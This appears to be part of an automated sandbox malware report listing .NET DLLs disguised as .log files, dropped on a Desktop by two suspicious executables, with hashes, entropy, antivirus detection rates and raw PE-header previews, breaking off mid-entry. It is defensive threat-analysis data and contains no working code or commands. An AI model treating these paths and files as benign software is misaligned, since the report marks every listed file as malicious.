                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\NKXFMJFr.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64000
                                                                                                                                                                        Entropy (8bit):5.857602289000348
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                                                                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                                                                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                                                                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                                                                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\OxfxrZpJ.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):69632
                                                                                                                                                                        Entropy (8bit):5.932541123129161
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                                                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                                                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                                                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                                                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                                                                                        C:\Users\user\Desktop\PHyNhJUm.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):39936
                                                                                                                                                                        Entropy (8bit):5.629584586954759
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                                                                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                                                                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                                                                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                                                                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\PybNxWBp.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32256
                                                                                                                                                                        Entropy (8bit):5.631194486392901
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                                                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                                                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                                                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                                                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\QvCVTWQk.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\RfmVTnPw.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):23552
                                                                                                                                                                        Entropy (8bit):5.529329139831718
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                                                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                                                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                                                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                                                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\TkxwTWEx.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                        Entropy (8bit):5.645950918301459
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                                                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                                                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                                                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                                                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\TuQMKFja.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):294912
                                                                                                                                                                        Entropy (8bit):6.010605469502259
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                                                                                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                                                                                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                                                                                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                                                                                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                                                                                                        C:\Users\user\Desktop\XXPuwSTl.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):36352
                                                                                                                                                                        Entropy (8bit):5.668291349855899
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\XpVNKoNn.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):70144
                                                                                                                                                                        Entropy (8bit):5.909536568846014
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                                                                                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                                                                                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                                                                                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                                                                                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\YqSdRlZU.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):33280
                                                                                                                                                                        Entropy (8bit):5.634433516692816
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                                                                                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                                                                                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                                                                                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                                                                                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\aeWlDzVS.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):34304
                                                                                                                                                                        Entropy (8bit):5.618776214605176
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                                                                                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                                                                                                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                                                                                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                                                                                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\cPBBKMgL.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40448
                                                                                                                                                                        Entropy (8bit):5.7028690200758465
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                                                                                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                                                                                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                                                                                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                                                                                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\cXlUovHQ.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):6.057993947082715
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\dBJtpdQc.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):6.057993947082715
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                                                                                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                                                                                                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                                                                                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                                                                                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\ddkcuipI.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):24576
                                                                                                                                                                        Entropy (8bit):5.535426842040921
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                                                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                                                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                                                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                                                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\eRokfvkG.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):36352
                                                                                                                                                                        Entropy (8bit):5.668291349855899
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                                                                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                                                                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                                                                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                                                                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\Desktop\fEwcKMUX.log

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40448
